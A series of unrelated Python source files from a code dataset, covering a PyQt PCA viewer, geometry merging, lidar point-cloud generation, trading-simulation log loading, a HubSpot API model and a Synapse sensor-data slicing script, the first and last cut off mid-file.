Element.get_fracs(PCA_VERTEX))\n self.method = method\n # кнопки визуализации\n if self.elements[0].dimensions_count > 1:\n self.action_draw_2D.setEnabled(True)\n if self.elements[0].dimensions_count > 2:\n self.action_draw_3D.setEnabled(True)\n\n @QtCore.pyqtSlot()\n def drawing(self, dimension):\n \"\"\"\n Отрисовываем (точки или интервалы).\n :param dimension: рисовать двух- или трёхмерную картину\n :param regime: рисуем данные по интервалам или точкам\n \"\"\"\n draw(self.elements, dimension, self.method)\n\n def set_table_model(self, data, vertical_header = '', horizontal_header = ''):\n \"\"\"\n Записываем данные в модель таблицы\n :param data: данные для записи. 
Должны иметьы (coordinates, dimensions_count) - возвращаеющий их координаты\n :param vertical_header: список вертикальных заголовков\n :param horizontal_header: список горизонтальных заголовков\n :return: QtGui.QStandardItemModel\n \"\"\"\n model = self.table.model() # получаем модель таблицы\n if not model: # если ещё ничего нет - создаём\n model = QtGui.QStandardItemModel(len(data), len(data[0]))\n # заполняем\n for row, shape in enumerate(data):\n for col, dimension in enumerate(shape):\n item = QtGui.QStandardItem(str(dimension))\n model.setItem(row, col, item)\n # задаём заголовки\n if vertical_header == '':\n vertical_header = ['Точка %i' %(i + 1) for i in range(len(data))]\n if horizontal_header == '':\n horizontal_header = ['Измерение %i' %(i + 1) for i in range(len(data[0]))]\n model.setVerticalHeaderLabels(vertical_header)\n model.setHorizontalHeaderLabels(horizontal_header)\n return model\n\n def set_language(self, new_lang):\n '''\n Присваиваем названия элементам интерфейса на выбранном языке\n '''\n self.config.lang = new_lang\n self.action_open_file.setText(self.t('open_file'))\n self.action_save_file.setText(self.t('save_file'))\n self.action_exit.setText(self.t('exit'))\n self.action_Qt.setText(self.t('about_Qt'))\n self.action_PCA_midpoint.setText(self.t('PCA_mid'))\n self.action_PCA_vertex.setText(self.t('PCA_vert'))\n self.action_draw_2D.setText(self.t('2d'))\n self.action_draw_3D.setText(self.t('3d'))\n self.actionAboutPCA.setText(self.t('about_PCA'))\n self.actionClaster.setText(self.t('claster'))\n self.menu.setTitle(self.t('file'))\n self.menu_2.setTitle(self.t('settings'))\n self.menu_3.setTitle(self.t('help'))\n self.menu_4.setTitle(self.t('lang'))\n self.menu_5.setTitle(self.t('data_handl'))\n self.menu_6.setTitle(self.t('visual'))\n self.menu_8.setTitle(self.t('PCA'))\n\n def t(self, key):\n return self.config.t[key]","sub_path":"SAID/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":10741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330275237","text":"from shapely.ops import linemerge\n\nfrom features.feature import Feature\n\n\ndef merge_features(features):\n \"\"\" Merge feature geometries together where possible, forming several\n contiguous MultiLineStrings. 
Applies data of first feature to all.\n\n Arguments:\n features {list} -- list of Features\n \"\"\"\n merged_features = []\n merged_geoms = linemerge([f.geom for f in features])\n\n if merged_geoms.geom_type == 'MultiLineString':\n merged_geoms = merged_geoms.geoms\n else:\n merged_geoms = [merged_geoms]\n\n for mg in merged_geoms:\n merged_features.append(Feature(mg, features[0].data))\n\n return merged_features\n","sub_path":"geometry/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445838158","text":"import copy\nimport itertools\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\nimport uncertainties\nimport time\nfrom uncertainties import umath\nfrom uncertainties import unumpy as unp\n\nfrom utilities import SYSTEM_STATES, Subscribable, Subscriber, UpdateSignal\n\nSTEPS_PER_ROTATION = 3200\nLIDAR_UNCERT = 0.05\n\n\nclass PointCloudGenerator(Subscribable, Subscriber):\n def __init__(self, point_cloud_file_name):\n super().__init__()\n\n self.point_cloud_file_name = point_cloud_file_name\n self.target_measurements = defaultdict(lambda: defaultdict(tuple))\n self.scan_measurements = defaultdict(list)\n self.my_locations = defaultdict(tuple)\n self.target_locations = defaultdict(lambda: defaultdict(tuple))\n self.scan_locations = defaultdict(list)\n self.iteration = None\n self.last_save = time.time()\n\n def signal(self, signal: UpdateSignal, data=None):\n if signal == UpdateSignal.NEW_DATA:\n self.handle_new_data(data)\n return super().signal(signal, data=data)\n\n def handle_new_data(self, data):\n system_state = data[0]\n if system_state == SYSTEM_STATES.LOCALIZE:\n state_iteration = data[1]\n self.iteration = state_iteration\n target_id = data[2]\n self.target_measurements[state_iteration][target_id] = tuple(data[3:])\n return\n if system_state == SYSTEM_STATES.SCAN:\n state_iteration = data[1]\n self.iteration = state_iteration\n measurement = tuple(data[2:])\n self.scan_measurements[state_iteration].append(measurement)\n self.scan_locations[state_iteration].append(\n self.measurement_to_location(measurement)\n )\n if time.time() - self.last_save > 1:\n self.save_scan()\n self.last_save = time.time()\n\n self.signal_subscribers(UpdateSignal.NEW_DATA)\n\n def measurement_to_location(self, measurement):\n R = self.generate_rotation_matrix()\n relative_location = np.matmul(R, measurement_to_xyz(measurement))\n inertial_location = self.my_locations[self.iteration] + relative_location\n return inertial_location\n\n def generate_rotation_matrix(self):\n # TODO: handle multiple targets\n targets = self.target_measurements[self.iteration]\n t1 = targets[1]\n t2 = targets[2]\n p1 = measurement_to_xyz(t1)\n p2 = measurement_to_xyz(t2)\n xax = np.reshape(unp.uarray([1, 0, 0], [0.0, 0.0, 0.0]), (3,))\n p2p1 = p2 - p1\n print(\"Target delta:\", p2p1)\n R = rotation_matrix_from(p2p1, xax)\n self.my_locations[self.iteration] = np.matmul(R, -p1.copy())\n return R\n\n def save_scan(self):\n locs = []\n for iteration in self.scan_locations.keys():\n locs += self.scan_locations[iteration]\n print(len(locs))\n locs = np.array(locs)\n locs = np.squeeze(locs, axis=(1,))\n locs = unp.nominal_values(locs)\n np.save(self.point_cloud_file_name, locs)\n\n\ndef unorm(v):\n return (v[0] ** 2 + v[1] ** 2 + v[2] ** 2) ** 0.5\n\n\ndef rotation_matrix_from(A, B):\n A = A / unorm(A)\n B = B / unorm(B)\n\n v = np.cross(A, B)\n s = unorm(v)\n c = np.dot(A, B)\n\n 
ssm = np.array([[0, -v[2], v[1]], [v[2], 0, -v[0]], [-v[1], v[0], 0]])\n\n R = np.eye(3) + ssm + np.matmul(ssm, ssm) / (1 + c)\n R = unp.matrix(R)\n return R\n\n\ndef measurement_to_xyz(measurement):\n theta_step, phi_step, dist = measurement\n dist = uncertainties.ufloat(dist, LIDAR_UNCERT)\n theta_step = uncertainties.ufloat(theta_step, 0.05)\n phi_step = uncertainties.ufloat(phi_step, 0.05)\n return np.array(\n [\n dist\n * umath.cos(theta_step * 360 / STEPS_PER_ROTATION * np.pi / 180)\n * umath.cos(phi_step * 360 / STEPS_PER_ROTATION * np.pi / 180),\n dist\n * umath.sin(theta_step * 360 / STEPS_PER_ROTATION * np.pi / 180)\n * umath.cos(phi_step * 360 / STEPS_PER_ROTATION * np.pi / 180),\n dist * umath.sin(phi_step * 360 / STEPS_PER_ROTATION * np.pi / 180),\n ]\n )\n\n\nif __name__ == \"__main__\":\n gen = PointCloudGenerator(\"temp\")\n t1 = (\"LOCALIZE\", 1, 1, 0, 0, 0)\n t2 = (\"LOCALIZE\", 1, 2, 10, 0, 0)\n\n (gen.signal(UpdateSignal.NEW_DATA, t1))\n (gen.signal(UpdateSignal.NEW_DATA, t2))\n p1 = (\"SCAN\", 1, 5, 0, 50)\n (gen.signal(UpdateSignal.NEW_DATA, p1))\n (gen.signal(UpdateSignal.NEW_DATA, p1))\n\n print(gen.target_measurements) # print the state; the bare expressions here were no-ops\n print(gen.scan_measurements)\n print(gen.my_locations[1])\n locs = gen.scan_locations[1]\n locs = np.array(locs)\n locs = np.squeeze(locs, axis=(1,))\n locs = unp.nominal_values(locs)","sub_path":"point_cloud_generator.py","file_name":"point_cloud_generator.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"9362561","text":"# Script for reading data from random traders\r\n\r\n# Import libs\r\n# Import `AmmEnginePyTools` from custom dir\r\nimport importlib.machinery\r\n\r\nloader = importlib.machinery.SourceFileLoader('OrderBooks', '../../../AmmEnginePyTools/OrderBooks.py')\r\nOrderBooks = loader.load_module()\r\n\r\nimport pandas as pd\r\n\r\n\r\n# Define Class\r\nclass AnalysisSimulation():\r\n\r\n def __init__(self, instrument, exchange, file_path, number_sims=1, offset=0):\r\n self.Instrument = instrument\r\n self.Exchange = exchange\r\n self.Number_Of_Simulations = number_sims\r\n self.Sim_Numbering_Offset = offset\r\n self.File_Path = file_path\r\n\r\n def gen_file_list(self, name):\r\n return [self.Instrument + \"_\" + self.Exchange + \"@%i_\" % i + name for i in\r\n range(self.Sim_Numbering_Offset, self.Number_Of_Simulations)]\r\n\r\n\r\ndef GenerateAgentNames(number_of_markets: int, number_of_agents: int, agent_name_prefix: str) -> list:\r\n ''' Function for generating a list of agent names based on an agent name prefix string, the number of sims and\r\n the number of agents in each sim'''\r\n AgentNames: list = [] # Make a list of agent names\r\n for i in range(number_of_markets):\r\n AgentNames.append([agent_name_prefix + \"-%i-%i\" % (i, j) for j in range(1, number_of_agents)])\r\n return AgentNames\r\n\r\n\r\ndef Prepare_SimOrderBook(SimOrderBooks):\r\n for SimOrderBook in SimOrderBooks:\r\n SimOrderBook.OrderBook[\"DateTime\"] = pd.to_datetime(SimOrderBook.OrderBook[\"Nanos\"],\r\n utc=True).dt.tz_convert(\r\n \"America/New_York\") # Make a datetime column and specify that nanos are in utc and convert to localtime ie NY time\r\n SimOrderBook.OrderBook = SimOrderBook.OrderBook[\r\n SimOrderBook.OrderBook[\"DateTime\"].dt.weekday < 5] # Skip Weekends\r\n\r\ndef Prepare_TradesLogs(TradesLogs):\r\n for TradeLog in TradesLogs:\r\n TradeLog[\"DateTime\"] = pd.to_datetime(TradeLog[\"Nanos\"],\r\n utc=True).dt.tz_convert(\r\n \"America/New_York\") # Make a datetime column and specify that nanos are in utc and convert to localtime ie NY time\r\n TradeLog.drop(TradeLog[TradeLog[\"DateTime\"].dt.weekday >= 5].index,\r\n inplace=True) # Skip Weekends in place; rebinding TradeLog inside the loop discarded the filter\r\n\r\n\r\nfrom multiprocessing import Pool, cpu_count\r\ndef GetData(path):\r\n #if __name__ == \"__main__\":\r\n # Class for keeping track of files\r\n SPYFiles = AnalysisSimulation(instrument=\"SPY\",\r\n exchange=\"NYSE\",\r\n file_path=path,\r\n number_sims=10,\r\n offset=0\r\n )\r\n\r\n # Generate lists of files for use in analysis\r\n SPYFiles.SimOBList = SPYFiles.gen_file_list(\"Matching-OrderBook.csv\")\r\n SPYFiles.AgentLogList = SPYFiles.gen_file_list(\"Matching-agents.csv\")\r\n # SPYFiles.MMLogList = SPYFiles.gen_file_list(\"Matching-OpenOrders.csv\")\r\n\r\n USDFiles = AnalysisSimulation(instrument=\"USD\",\r\n exchange=\"NYSE\",\r\n file_path=path,\r\n number_sims=10,\r\n offset=0\r\n )\r\n USDFiles.InventoryLogList = USDFiles.gen_file_list(\"Historical-inventory.csv\") # Random trader logs\r\n\r\n TradesFiles = AnalysisSimulation(instrument=\"SPY\",\r\n exchange=\"NYSE\",\r\n file_path=path,\r\n number_sims=10,\r\n offset=0)\r\n TradesFiles.TradesLogList = TradesFiles.gen_file_list(\"Matching-MarketOrders.csv\")\r\n\r\n with Pool(cpu_count()) as p:\r\n # Read simulation order book\r\n SimOrderBooks = p.map(OrderBooks.AmmEngineOrderBook_Wrapper,\r\n [{\"order_book_file_path\": SPYFiles.File_Path + LogName,\r\n \"order_book_file_type\": \"Amm engine order book file\",\r\n \"order_book_depth\": 10} for LogName in SPYFiles.SimOBList]\r\n )\r\n # Read agent order book\r\n AgentLogs = p.map(OrderBooks.AgentsLog_Wrapper, [{\"log_file_path\": SPYFiles.File_Path + AgentLogName,\r\n \"agent_log_file_type\": \"Amm engine agents log file\"} for\r\n AgentLogName in SPYFiles.AgentLogList]\r\n )\r\n\r\n # Read Market Maker order book. 
commented\r\n # AgentsOrderBook_ColumnNames = [\"AgentName\",\r\n # \"Nanos\",\r\n # \"DateTime\",\r\n # \"AgentBestBidQty\",\r\n # \"AgentBestBid\",\r\n # \"AgentBestAsk\",\r\n # \"AgentBestAskQty\",\r\n # \"scale\"]\r\n\r\n # MMLogs = p.map(OrderBooks.AmmEngineAgentOrderBook_Wrapper,\r\n # [{\"agent_name\": \"InvMM-%i-0\" % (i + SPYFiles.Sim_Numbering_Offset),\r\n # \"order_book_file_path\": SPYFiles.File_Path + MMLogName,\r\n # \"order_book_file_type\": \"Inventory market maker 2 order book log\",\r\n # \"order_book_depth\": 2,\r\n # \"column_names\": AgentsOrderBook_ColumnNames} for i, MMLogName in\r\n # enumerate(SPYFiles.MMLogList)]\r\n #\r\n # )\r\n\r\n # Read random trades cash inventory\r\n\r\n InventoryLogList_ColumnNames = [\"AgentName\",\r\n \"Nanos\",\r\n \"DateTime\",\r\n \"Cash\"]\r\n\r\n # InventoryLogList_ColumnTypes = {\"AgentName\": str,\"Nanos\": str, \"DateTime\": str, \"Cash\": str}\r\n RT_CashInventory = p.map(OrderBooks.Read_CSV_Wrapper, [{\"filepath_or_buffer\": SPYFiles.File_Path + LogName,\r\n \"index_col\": False,\r\n \"names\": InventoryLogList_ColumnNames,\r\n \"header\": 1} for LogName in USDFiles.InventoryLogList]\r\n )\r\n TradesLogList_ColumnNames = [\"Nanos\",\r\n \"DateTime\",\r\n \"Agent\",\r\n \"Action\",\r\n \"Inst\",\r\n \"Side\",\r\n \"OrderQty\",\r\n \"OrderPrice\",\r\n \"FilledQty\",\r\n \"AvgPrice\",\r\n \"TimeInForce\",\r\n \"OrderID\",\r\n \"Method\",\r\n \"Param\"]\r\n\r\n TradesLogs = p.map(OrderBooks.Read_CSV_Wrapper,[{\"filepath_or_buffer\": TradesFiles.File_Path + LogName,\r\n \"index_col\": False,\r\n \"names\": TradesLogList_ColumnNames,\r\n \"header\": 1} for LogName in TradesFiles.TradesLogList]\r\n )\r\n Prepare_SimOrderBook(SimOrderBooks)\r\n return SimOrderBooks, AgentLogs, RT_CashInventory, TradesLogs\r\n if __name__ != \"__main__\":\r\n print(\"Not in __main__\")\r\n\r\n","sub_path":"Toymarket1/LoadRandomTradersToymarketData.py","file_name":"LoadRandomTradersToymarketData.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603351413","text":"# coding: utf-8\n\n\"\"\"\n Calling Extensions API\n\n Provides a way for apps to add custom calling options to a contact record. This works in conjunction with the [Calling SDK](#), which is used to build your phone/calling UI. The endpoints here allow your service to appear as an option to HubSpot users when they access the *Call* action on a contact record. Once accessed, your custom phone/calling UI will be displayed in an iframe at the specified URL with the specified dimensions on that record. 
# noqa: E501\n\n The version of the OpenAPI document: v3\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\ntry:\n from inspect import getfullargspec\nexcept ImportError:\n from inspect import getargspec as getfullargspec\nimport pprint\nimport re # noqa: F401\nimport six\n\nfrom hubspot.crm.extensions.calling.configuration import Configuration\n\n\nclass SettingsResponse(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\"name\": \"str\", \"url\": \"str\", \"height\": \"int\", \"width\": \"int\", \"is_ready\": \"bool\", \"supports_custom_objects\": \"bool\", \"created_at\": \"datetime\", \"updated_at\": \"datetime\"}\n\n attribute_map = {\n \"name\": \"name\",\n \"url\": \"url\",\n \"height\": \"height\",\n \"width\": \"width\",\n \"is_ready\": \"isReady\",\n \"supports_custom_objects\": \"supportsCustomObjects\",\n \"created_at\": \"createdAt\",\n \"updated_at\": \"updatedAt\",\n }\n\n def __init__(self, name=None, url=None, height=None, width=None, is_ready=None, supports_custom_objects=None, created_at=None, updated_at=None, local_vars_configuration=None): # noqa: E501\n \"\"\"SettingsResponse - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration.get_default_copy()\n self.local_vars_configuration = local_vars_configuration\n\n self._name = None\n self._url = None\n self._height = None\n self._width = None\n self._is_ready = None\n self._supports_custom_objects = None\n self._created_at = None\n self._updated_at = None\n self.discriminator = None\n\n self.name = name\n self.url = url\n self.height = height\n self.width = width\n self.is_ready = is_ready\n self.supports_custom_objects = supports_custom_objects\n self.created_at = created_at\n self.updated_at = updated_at\n\n @property\n def name(self):\n \"\"\"Gets the name of this SettingsResponse. # noqa: E501\n\n The name of your calling service to display to users. # noqa: E501\n\n :return: The name of this SettingsResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this SettingsResponse.\n\n The name of your calling service to display to users. # noqa: E501\n\n :param name: The name of this SettingsResponse. # noqa: E501\n :type name: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501\n raise ValueError(\"Invalid value for `name`, must not be `None`\") # noqa: E501\n\n self._name = name\n\n @property\n def url(self):\n \"\"\"Gets the url of this SettingsResponse. # noqa: E501\n\n The URL to your phone/calling UI, built with the [Calling SDK](#). # noqa: E501\n\n :return: The url of this SettingsResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._url\n\n @url.setter\n def url(self, url):\n \"\"\"Sets the url of this SettingsResponse.\n\n The URL to your phone/calling UI, built with the [Calling SDK](#). # noqa: E501\n\n :param url: The url of this SettingsResponse. 
# noqa: E501\n :type url: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and url is None: # noqa: E501\n raise ValueError(\"Invalid value for `url`, must not be `None`\") # noqa: E501\n\n self._url = url\n\n @property\n def height(self):\n \"\"\"Gets the height of this SettingsResponse. # noqa: E501\n\n The target height of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :return: The height of this SettingsResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this SettingsResponse.\n\n The target height of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :param height: The height of this SettingsResponse. # noqa: E501\n :type height: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and height is None: # noqa: E501\n raise ValueError(\"Invalid value for `height`, must not be `None`\") # noqa: E501\n\n self._height = height\n\n @property\n def width(self):\n \"\"\"Gets the width of this SettingsResponse. # noqa: E501\n\n The target width of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :return: The width of this SettingsResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._width\n\n @width.setter\n def width(self, width):\n \"\"\"Sets the width of this SettingsResponse.\n\n The target width of the iframe that will contain your phone/calling UI. # noqa: E501\n\n :param width: The width of this SettingsResponse. # noqa: E501\n :type width: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and width is None: # noqa: E501\n raise ValueError(\"Invalid value for `width`, must not be `None`\") # noqa: E501\n\n self._width = width\n\n @property\n def is_ready(self):\n \"\"\"Gets the is_ready of this SettingsResponse. # noqa: E501\n\n When true, your service will appear as an option under the *Call* action in contact records of connected accounts. # noqa: E501\n\n :return: The is_ready of this SettingsResponse. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._is_ready\n\n @is_ready.setter\n def is_ready(self, is_ready):\n \"\"\"Sets the is_ready of this SettingsResponse.\n\n When true, your service will appear as an option under the *Call* action in contact records of connected accounts. # noqa: E501\n\n :param is_ready: The is_ready of this SettingsResponse. # noqa: E501\n :type is_ready: bool\n \"\"\"\n if self.local_vars_configuration.client_side_validation and is_ready is None: # noqa: E501\n raise ValueError(\"Invalid value for `is_ready`, must not be `None`\") # noqa: E501\n\n self._is_ready = is_ready\n\n @property\n def supports_custom_objects(self):\n \"\"\"Gets the supports_custom_objects of this SettingsResponse. # noqa: E501\n\n When true, you are indicating that your service is compatible with engagement v2 service and can be used with custom objects. # noqa: E501\n\n :return: The supports_custom_objects of this SettingsResponse. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._supports_custom_objects\n\n @supports_custom_objects.setter\n def supports_custom_objects(self, supports_custom_objects):\n \"\"\"Sets the supports_custom_objects of this SettingsResponse.\n\n When true, you are indicating that your service is compatible with engagement v2 service and can be used with custom objects. # noqa: E501\n\n :param supports_custom_objects: The supports_custom_objects of this SettingsResponse. 
# noqa: E501\n :type supports_custom_objects: bool\n \"\"\"\n if self.local_vars_configuration.client_side_validation and supports_custom_objects is None: # noqa: E501\n raise ValueError(\"Invalid value for `supports_custom_objects`, must not be `None`\") # noqa: E501\n\n self._supports_custom_objects = supports_custom_objects\n\n @property\n def created_at(self):\n \"\"\"Gets the created_at of this SettingsResponse. # noqa: E501\n\n When this calling extension was created. # noqa: E501\n\n :return: The created_at of this SettingsResponse. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._created_at\n\n @created_at.setter\n def created_at(self, created_at):\n \"\"\"Sets the created_at of this SettingsResponse.\n\n When this calling extension was created. # noqa: E501\n\n :param created_at: The created_at of this SettingsResponse. # noqa: E501\n :type created_at: datetime\n \"\"\"\n if self.local_vars_configuration.client_side_validation and created_at is None: # noqa: E501\n raise ValueError(\"Invalid value for `created_at`, must not be `None`\") # noqa: E501\n\n self._created_at = created_at\n\n @property\n def updated_at(self):\n \"\"\"Gets the updated_at of this SettingsResponse. # noqa: E501\n\n The last time the settings for this calling extension were modified. # noqa: E501\n\n :return: The updated_at of this SettingsResponse. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._updated_at\n\n @updated_at.setter\n def updated_at(self, updated_at):\n \"\"\"Sets the updated_at of this SettingsResponse.\n\n The last time the settings for this calling extension were modified. # noqa: E501\n\n :param updated_at: The updated_at of this SettingsResponse. # noqa: E501\n :type updated_at: datetime\n \"\"\"\n if self.local_vars_configuration.client_side_validation and updated_at is None: # noqa: E501\n raise ValueError(\"Invalid value for `updated_at`, must not be `None`\") # noqa: E501\n\n self._updated_at = updated_at\n\n def to_dict(self, serialize=False):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n def convert(x):\n if hasattr(x, \"to_dict\"):\n args = getfullargspec(x.to_dict).args\n if len(args) == 1:\n return x.to_dict()\n else:\n return x.to_dict(serialize)\n else:\n return x\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n attr = self.attribute_map.get(attr, attr) if serialize else attr\n if isinstance(value, list):\n result[attr] = list(map(lambda x: convert(x), value))\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], convert(item[1])), value.items()))\n else:\n result[attr] = convert(value)\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, SettingsResponse):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, SettingsResponse):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"hubspot/crm/extensions/calling/models/settings_response.py","file_name":"settings_response.py","file_ext":"py","file_size_in_byte":11681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298529690","text":"'''\nStores three tables 
to Synapse (under `TABLE_OUTPUT`):\n\nMC10 Sensor Measurements\n columns task_id, sensor_location, mc10_accelerometer, mc10_gyroscope, mc10_emg\nSmartwatch Sensor Measurements\n columns task_id, smartwatch_accelerometer\nMotor Task Timestamps and Scores\n columns task_id, subject_id, visit, task, task_code, start_utc, stop_utc,\n tremor_left, tremor_right, bradykinesia_left, bradykinesia_right,\n dyskinesia_left, dyskinesia_right, overall, validated, side\n'''\n\nimport os\nimport uuid\nimport argparse\nimport tempfile\nimport multiprocessing.dummy # plain import multiprocessing does not expose the dummy submodule used below\nimport synapseclient as sc\nimport synapseutils as su\nimport pandas as pd\n\nTESTING = False\nSCORES = \"syn18435302\"\nMC10_MEASUREMENTS = \"syn18822536\" if TESTING else \"syn18435632\"\nSMARTWATCH_MEASUREMENTS = \"syn18822537\" if TESTING else \"syn18435623\"\nSMARTWATCH_SENSOR_NAME = \"smartwatch\"\nMC10_SENSOR_NAME = \"mc10\"\nFRAC_TO_STORE = 0.02 if TESTING else 1\nTABLE_OUTPUT = \"syn11611056\" if TESTING else \"syn18407520\"\nTASK_CODE_MAP = { # synchronize with MJFF Levodopa release\n \"Drnkg\": \"drnkg\",\n \"Drwg\": \"drwg\",\n \"Fldg\": \"fldng\",\n \"FtnL\": \"ftnl\",\n \"FtnR\": \"ftnr\",\n \"NtsBts\": \"ntblt\",\n \"RamL\": \"raml\",\n \"RamR\": \"ramr\",\n \"Sheets\": \"orgpa\",\n \"Sitng\": \"sittg\",\n \"SitStand\": \"ststd\",\n \"Stndg\": \"stndg\",\n \"Typg\": \"typng\",\n \"Wlkg\": \"wlkgs\",\n \"WlkgCnt\": \"wlkgc\"}\nSCORES_COL_MAP = {\n \"SubjID\": \"subject_id\",\n \"Visit\": \"visit\",\n \"Task\": \"task\",\n \"TaskAbb\": \"task_code\",\n \"Start Timestamp (UTC)\": \"start_utc\",\n \"Stop Timestamp (UTC)\": \"stop_utc\",\n \"Tremor - Left\": \"tremor_left\",\n \"Tremor - Right\": \"tremor_right\",\n \"Bradykinesia - Left\": \"bradykinesia_left\",\n \"Bradykinesia - Right\": \"bradykinesia_right\",\n \"Dyskinesia - Left\": \"dyskinesia_left\",\n \"Dyskinesia - Right\": \"dyskinesia_right\",\n \"Overall\": \"overall\",\n \"Validated\": \"validated\",\n \"Side\": \"smartwatch_side\"}\n\n\ndef read_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--download-in-parallel\", action=\"store_const\",\n const=True, default = False)\n parser.add_argument(\"--upload-in-parallel\", action=\"store_const\",\n const=True, default = False)\n args = parser.parse_args()\n return(args)\n\n\ndef read_syn_table(syn, synapse_id, q = \"select * from {}\"):\n q = syn.tableQuery(q.format(synapse_id))\n df = q.asDataFrame()\n return df\n\n\ndef parse_info_from_filename(fname, sensor):\n if sensor == SMARTWATCH_SENSOR_NAME:\n _, subject_id, year_month = os.path.splitext(fname)[0].split(\"_\")\n year, month = tuple(map(int, year_month.split(\"-\")))\n elif sensor == MC10_SENSOR_NAME:\n subject_id = int(os.path.splitext(fname)[0].split(\"_\")[1])\n year, month = None, None\n else:\n raise TypeError(\"sensor must be one of {} or {}\".format(\n SMARTWATCH_SENSOR_NAME, MC10_SENSOR_NAME))\n return subject_id, year, month\n\n\ndef find_relevant_scores(fname, scores, sensor):\n def is_match(t, year, month, f_subject_id, score_subject_id):\n if int(f_subject_id) == int(score_subject_id):\n if year is None or month is None:\n return True\n elif isinstance(year, int) and isinstance(month, int):\n return year == t.year and month == t.month\n else:\n raise TypeError(\"Year and month must both be integers.\")\n else:\n return False\n subject_id, year, month = parse_info_from_filename(fname, sensor)\n relevent_scores = scores.apply(\n lambda s : is_match(s.start_utc, year, month, subject_id, s.subject_id),\n axis = 1)\n return 
scores[relevent_scores]\n\n\ndef new_data_column(syn, scores, col, parent, filtering_prefix, sensor,\n download_in_parallel):\n relevant_entities = download_relevant_children(\n syn, parent, filtering_prefix, scores, sensor, download_in_parallel)\n all_sliced_measurements = pd.DataFrame()\n for syn_id in relevant_entities:\n f, task_ids = (relevant_entities[syn_id][\"synapse_file\"],\n relevant_entities[syn_id][\"task_ids\"])\n sliced_measurements = slice_sensor_measurement(f, scores, task_ids, sensor)\n sliced_measurements = sliced_measurements.rename(\n {\"sensor_data\": col}, axis = 1)\n relevant_entities[syn_id][\"data\"] = sliced_measurements\n if len(relevant_entities):\n all_sliced_measurements = pd.concat(\n [relevant_entities[syn_id][\"data\"] for syn_id in relevant_entities],\n axis=0)\n return(all_sliced_measurements)\n\n\ndef download_relevant_children(syn, parent, filtering_prefix, scores, sensor,\n download_in_parallel=False):\n \"\"\"\n Returns\n -------\n dict with key synapse_id (str) and values synapse_file (File), task_ids (list)\n \"\"\"\n _, _, entity_info = list(su.walk(syn, parent))[0]\n entity_info = [(i, j) for i, j in entity_info if i.startswith(filtering_prefix)]\n relevant_entities = {}\n for fname, syn_id in entity_info:\n relevant_scores = find_relevant_scores(fname, scores, sensor)\n if len(relevant_scores):\n relevant_entities[syn_id] = {\"synapse_file\": None,\n \"task_ids\": relevant_scores.task_id}\n ordered_synapse_ids = list(relevant_entities.keys())\n if download_in_parallel:\n mp = multiprocessing.dummy.Pool(4)\n children = mp.map(syn.get, ordered_synapse_ids)\n else:\n children = list(map(syn.get, ordered_synapse_ids))\n for syn_id, f in zip(ordered_synapse_ids, children):\n relevant_entities[syn_id][\"synapse_file\"] = f\n return relevant_entities\n\n\ndef slice_from_score(sensor_measurement, score, sensor):\n \"\"\"\n Returns\n -------\n a pandas DataFrame with columns location and sensor_data\n \"\"\"\n result = pd.DataFrame(columns = [\"sensor_location\", \"sensor_data\"])\n start, stop = score.loc[\"start_utc\"], score.loc[\"stop_utc\"]\n relevant_range = sensor_measurement[start:stop]\n if len(relevant_range) == 0:\n pass\n elif sensor == \"mc10\":\n for location in relevant_range.Location.unique():\n local_range = relevant_range.query(\"Location == @location\")\n local_range = local_range.drop([\"SubjID\", \"Location\"], axis = 1)\n local_range = local_range.reset_index(drop=False)\n time_zero = local_range.Timestamp.iloc[0]\n local_range.Timestamp = local_range.Timestamp - time_zero\n local_range.Timestamp = local_range.Timestamp.apply(\n lambda td : 